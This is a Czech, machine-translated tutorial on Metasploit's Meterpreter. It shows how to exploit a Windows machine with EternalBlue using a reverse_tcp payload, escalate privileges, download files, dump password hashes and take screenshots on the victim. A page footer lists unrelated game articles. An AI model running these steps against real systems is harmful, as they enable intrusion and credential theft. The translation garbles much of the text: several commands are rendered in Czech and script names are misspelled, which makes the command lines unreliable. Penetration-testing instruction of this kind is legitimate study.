metasploit

Následné vykořisťování pomocí Meterpreter

Následné vykořisťování pomocí Meterpreter
Toto je úvod do pluginu užitečného zatížení Meterpreter v Metasploit. V tomto krátkém tutoriálu probereme, jak jej použít k aplikaci post exploitation na systém Windows, jakmile jste jej již porušili pomocí exploze Eternalblue. Omezíme se na přístup k systému Windows a jeho prozkoumávání a všechny věci, které uděláme, se zaměří na přístup k informacím a pověření uživatele.

Úvod do měřicího přístroje

Meterpreter je užitečné zatížení útoku v rámci Metasploit, které umožňuje pachateli ovládat a procházet počítač oběti prostřednictvím příkazového shellu. Může se ukázat jako velmi univerzální nástroj, pokud jde o penetrační testování.  Jedná se o post-exploitační nástroj, který je založen na injektování DLL v paměti, což znamená, že se injektovaná DLL spustí vytvořením nového procesu, který volá, aby systém spustil injektovanou DLL. Může vám poskytnout přístup k neviditelnému příkazovému prostředí na počítači oběti, což vám umožní spouštět spustitelné soubory a profilové sítě.

Původně byl napsán pro Metasploit 2.x a je upgradován na Metasploit 3.

Budeme podrobně diskutovat o použití Meterpreteru, ale předtím si promluvme o užitečných nákladech obecně

Co jsou užitečné zatížení?

Užitečné zatížení v Metasploit jsou moduly, což znamená, že jsou to úryvky kódů v Metasploit, které běží na vzdáleném systému, na který cílíme. Nejprve se odešle modul exploit, který nainstaluje modul užitečného zatížení do systému. Poté užitečné zatížení poskytuje přístup útočníkovi (omezený nebo plnohodnotný, záleží na obsahu užitečného zatížení). Abychom dále rozvinuli fungování užitečných zatížení, musíme diskutovat o jeho typech, které jsou celkem 3:

Nezadaní

Tato užitečná zatížení jsou zcela samostatná, což znamená, že mohou být stejně základní jako kódy brány, které umožňují uživateli vstoupit do cílového systému.

Stagers

Stagery jsou užitečné zatížení, které shromažďuje aplikace v cílovém systému a odesílá je útočníkovi. Vytváří spojení mezi obětí s naším místním počítačem.

Fáze

Jakmile mají odstupující přístup do systému, stáhnou si moduly fází. Fázové moduly odstraňují víčko velikosti na měřiči.

Příkladem fází by mohl být jednoduchý shell, iPhone 'ipwn' shell, moduly Meterpreter, VNC Injection.

Typ užitečného zatížení můžete zjistit zjišťováním jeho názvu. Jednotlivá užitečná zatížení mají obvykle formát /

Vykořisťování s Meterpreter

Nejprve spusťte konzolu msf zadáním následujícího příkazu terminálu v okně terminálu Kali.

$ sudo msfconsole

Jako stager používáme reverse_tcp a jako fázi Meterpreter.

Začneme nastavením exploze Eternal Blue. Vyberte (ms17_010_eternalblue) a poté nastavte windows / x64 / meterpreter / reverse_tcp jako vybrané užitečné zatížení

Dále nakonfigurujte nastavení zneužití a poté spusťte příkaz zneužít pomocí exploitu:

$ nastavit užitečné zatížení windows / x64 / meterpreter / reverse_tcp
$ nastavit rhost 192.168.198.136
$ využívat

The Eternalblue zneužít byl úspěšně aktivován.

Post vykořisťování

Během post-exploatace přistupujeme k již napadenému systému a manipulujeme s ním.

Nyní, když máme přístup do systému, můžeme dělat spoustu věcí, ale jak bylo uvedeno výše, musíme se i nadále soustředit hlavně na stahování informací a získávání pověření uživatele zde

Správa přístupových oprávnění:

V závislosti na modulu užitečné zátěže a využití, které jste použili, můžete čelit určitým omezením přístupu, která vážně ochromí vaše schopnosti manévrovat se strojem oběti. Tento problém můžete obejít s eskalací privilegií odstraněním hesel a manipulací s registry. Oprávnění můžete také eskalovat pomocí příkazu Meterpreter's get system -command.

$ dostane systém
$ getuid

Přenos souborů s Meterpreter

S Meterpreterem si můžete stáhnout soubor pomocí příkazu $ download-.

$ download / windows / system32 / drivers / etc / hosts

Podobně můžete také nahrát informace do zařízení pomocí příkazu $ upload-

Extrahování pověření uživatele:

Pomocí kódu skriptu credential_collector extrahujte informace o uživatelských účtech nebo použijte modul příspěvku hash dump k podobnému efektu.

K získání údajů o pověření použijeme modul hash dump post. Zadejte následující příkaz msf.

$ run post / windows / collect / hashdump

Jak vidíme, získali jsme účty Coen, Guest a Admin. LM hash (administrátor) a NTLM (host) hash se týká prázdných hesel, zatímco Coen hash je heslo, které budete muset prolomit. Můžete tak učinit pomocí crackeru hesla.

Automatizace škrábání systému

Může být zdlouhavé shromažďovat informace pomocí jednotlivých vstupních příkazů, které musíte neustále napájet příkazovým shellem. Pohodlně můžete tento proces trochu zautomatizovat pomocí skriptu vineum. Skript shromažďuje informace od oběti a stahuje data do našeho místního počítače. Bude vám řečeno, kam se výstup ukládá, jak vidíte ve čtvrtém řádku shora:

$ run wineum

Pamatujte, že cesta, kde je uložen výstup každého příkazu, se může lišit od cesty zobrazené zde.

Pojďme se trochu víc zabavit

Spouštění souborů

Libovolný soubor v systému můžete spustit pomocí: execute -f . To zahrnuje spustitelné soubory i programy s více podpůrnými soubory. Chcete-li například spustit integrovanou aplikaci kalkulačky v operačním systému Windows, zadejte příkaz execute -f calc.exe

Pořizování snímků obrazovky

Můžete také pořizovat snímky obrazovky z pohledu uživatele. Jednoduše zadejte snímek obrazovky do příkazového prostředí Meterpreter a získáte snímek obrazovky displeje v systému.

$ provést -f kal.exe
$ snímek obrazovky

Závěr:

Toto byl krátký úvod do pluginu Meterpreter v rámci Metasploit, spolu s krátkým průvodcem představujícím jeho nejzákladnější použití. Naučili jsme se zde, jak můžeme narušit systém Windows OS pomocí Eternalblue zneužít k získání přístupu, pak použít Meterpreter k eskalaci oprávnění, ručnímu shromažďování informací a automatizačním příkazem vineus. Také jsme se naučili, jak spouštět soubory na počítači oběti.

Meterpreter může sloužit jako znatelný prostředek detekce zranitelnosti, přestože se jedná o konglomeraci základních nástrojů v rámci Metasploit.

Hry Jak nainstalovat a hrát Doom na Linuxu
Jak nainstalovat a hrát Doom na Linuxu
Úvod do Doom Série Doom vznikla v 90. letech po vydání původního Doomu. Byl to okamžitý hit a od té doby herní série získala řadu ocenění a původní Do...
Hry Vulkan pro uživatele Linuxu
Vulkan pro uživatele Linuxu
S každou novou generací grafických karet vidíme, že vývojáři her posouvají hranice grafické věrnosti a přibližují se k fotorealismu. Ale navzdory vešk...
Hry OpenTTD vs Simutrans
OpenTTD vs Simutrans
Vytvoření vlastní simulace dopravy může být zábavné, uvolňující a mimořádně lákavé. Proto se musíte ujistit, že vyzkoušíte co nejvíce her, abyste našl...